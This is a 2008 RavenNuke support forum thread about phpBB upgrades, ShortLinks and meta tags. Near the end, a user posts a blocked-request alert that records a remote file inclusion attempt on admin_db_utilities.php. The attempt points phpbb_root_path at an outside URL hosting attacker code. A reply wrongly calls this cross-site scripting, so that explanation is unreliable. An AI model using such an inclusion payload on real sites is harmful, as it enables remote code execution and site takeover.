Ravens PHP Scripts: Forums

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> RN v2.20.00 - All Issues
Guardian2003
Site Admin

PostPosted: Sat Mar 08, 2008 5:22 pm Reply with quote

about $8

southern
Client

PostPosted: Sat Mar 08, 2008 10:12 pm Reply with quote

Oh OK

phearfactor

PostPosted: Sat Mar 08, 2008 11:28 pm Reply with quote

That's per month as well. Although it is free if I upgrade to a speed which my ADSL cannot achieve! Woo hoo hehe.

phearfactor

PostPosted: Tue Mar 11, 2008 12:59 am Reply with quote

Heya all.

Just got around to setting up my forum - its popping up with this though:

Quote:
Your installation does not seem to be up to date. Updates are available for your version of phpBB, please visit [ Only registered users can see links on this board! Get registered or login! ] to obtain the latest version of BBToNuke (the ported version of phpBB files for phpNuke).
The latest available version is phpBB 2.0.23. You are running phpBB 2.0.22.

[ Only registered users can see links on this board! Get registered or login! ] - I think this is the update

Which one, if any, should I be downloading?

Thanks!

jakec
Site Admin

PostPosted: Tue Mar 11, 2008 1:25 am Reply with quote

It would probably be just as easy to upgrade to the latest version of RavenNuke 2.20.01, as this includes the latest version of phpBB along with a number of other fixes. Wink

phearfactor

PostPosted: Tue Mar 11, 2008 1:31 am Reply with quote

Oh hehe. I had not realised there was an RN update. Thanks Jakec I will get on it now.

Update:

Yay

Quote:
Your installation is up to date, no updates are available for your version of phpBB.

Very Happy Very Happy

jakec

PostPosted: Tue Mar 11, 2008 6:40 am Reply with quote

Glad its working. Very Happy

phearfactor

PostPosted: Tue Mar 11, 2008 6:50 am Reply with quote

Hey Jakec. I found some posts that you had written where you was doing work on taps (shortlinks). I was wondering if you could tell where I can go to learn more about what they actually are and what they do?

Also, on my main website when I post news, I sometimes link back to the site I am quoting or telling people where to go.

How do I get it to 'tap' those links? It does not seem to do it automatically, although it does for everything else I have put on my website (all my weblinks got tapped I believe automatically and my blocks etc, but not the news posted in my topics).

I am really enjoying using RavenNuke now, I usually get bored pretty quickly but the more I work with this set-up the more it reveals. It's so interesting and all the addons are very useful I just haven't a clue what half of them are hehe.

Guardian2003

PostPosted: Tue Mar 11, 2008 7:02 am Reply with quote

Try [ Only registered users can see links on this board! Get registered or login! ] for more detailed info on taps etc as that is the source or ShortLinks which is included as part of the RavenNuke distribution.

You cannot really shorten links to an external source as you ould then be breaking the link.
For example if you are linking to bbc.co.uk/something/somethingelse.html and you change that url then the BBC website has no idea where you really want to be and would most likely give an error message.
HOWEVER if it is important for you to shorten the link visually you can do something like
href=" [ Only registered users can see links on this board! Get registered or login! ]"> [ Only registered users can see links on this board! Get registered or login! ]
All this does is make the link 'look' shorter.

phearfactor

PostPosted: Tue Mar 11, 2008 7:08 am Reply with quote

I did have a look at montego, it helped me set it up (I put a link back there in my weblinks as it was so helpful). I tried to look around for more detailed information on why it is needed, what it does and so on, I am interested in what it does with search engines?

I will have another look around the montego site and see if I can find anything.

Thanks Guardian.

montego
Site Admin

PostPosted: Wed Mar 12, 2008 5:36 am Reply with quote

This is the best I can offer: [ Only registered users can see links on this board! Get registered or login! ]

It would be even better if the link could include useful keywords in it, but the way *nuke is structured, without a rewrite of all the link producing code, this presents quite a challenge (with many possible solutions but each with its set of pros and cons).

phearfactor

PostPosted: Wed Mar 12, 2008 9:26 am Reply with quote

On the topic of useful keywords. Is there a meta tag generator for each page built into RN somewhere?

I had to modify the meta.php file to add my tags, but that just adds the same ones for every page which is a real shame. Anyway for a more custom meta set-up for pages like news/downloads/comments etc?

montego

PostPosted: Thu Mar 13, 2008 5:59 am Reply with quote

phearfactor wrote:
On the topic of useful keywords. Is there a meta tag generator for each page built into RN somewhere?

No.

kguske is working on the next rendition of nukeSEO and that will most likely be incorporated into RN and it should have dynamic meta tags too.

phearfactor

PostPosted: Fri Mar 14, 2008 1:42 am Reply with quote

Ah, thanks for the info montego. Can't wait to see that little add-on, sounds really cool.

phearfactor

PostPosted: Tue Mar 18, 2008 2:30 pm Reply with quote

I have been getting some strange emails lately. I was wondering if anyone can tell me what is happening?

Quote:
from Mail Delivery Subsystem <MAILER-DAEMON@*.secureserver.net>
to *@googlemail.com,
date Tue, Mar 18, 2008 at 7:57 PM
subject Returned mail: see transcript for details
mailed-by p3smtphosting*.secureserver.net

hide details 7:57 PM (25 minutes ago)

----- The following addresses had permanent fatal errors -----
h <t>
(reason: 550 5.1.1 <t@*.secureserver.net>... User unknown)
(expanded from: h <t>)

----- Transcript of session follows -----
... while talking to [127.0.0.1]:
> DATA
<<< 550 5.1.1 <t@*.secureserver.net>... User unknown
550 5.1.1 h <t>... User unknown
<<< 503 5.0.0 Need RCPT (recipient)

Final-Recipient: RFC822; t@*.secureserver.net
Action: failed
Remote-MTA: DNS; [127.0.0.1]
Diagnostic-Code: SMTP; 550 5.1.1 <t@p3slh138.shr.phx3.secureserver.net>... User unknown
Last-Attempt-Date: Tue, 18 Mar 2008 14:57:40 -0500

---------- Forwarded message ----------
To: h <t>
Date: Tue, 18 Mar 2008 12:57:40 -0700
Subject: Blocked abuse from 88.199.89.*
Date &amp; Time: 2008-03-18 12:57:37 MST GMT -0700
Blocked IP: 88.199.89.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0
Query String: //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebtown.com/shadow26/test.txt????
Get String: //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.freewebtown.com/shadow26/test.txt????
Post String: //modules/Forums/admin/admin_db_utilities.php
Forwarded For: none
Client IP: none
Remote Address: 88.199.89.45
Remote Port: 14000
Request Method: GET
--------------------
Who-Is for IP

Confused

Any idea what that means?

Guardian2003

PostPosted: Tue Mar 18, 2008 3:36 pm Reply with quote

Yes it means someone attempted a cross site scripting attack on the admin_db_utilities.php file

phearfactor

PostPosted: Tue Mar 18, 2008 6:08 pm Reply with quote

I guess the fact I got the email and my website is still running they failed hehe

It went into my spam box so I wasn't sure what it was. Thanks for the info Guardian!

Guardian2003

PostPosted: Wed Mar 19, 2008 1:26 am Reply with quote

No problem, glad to help

Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> RN v2.20.00 - All Issues

View next topic
View previous topic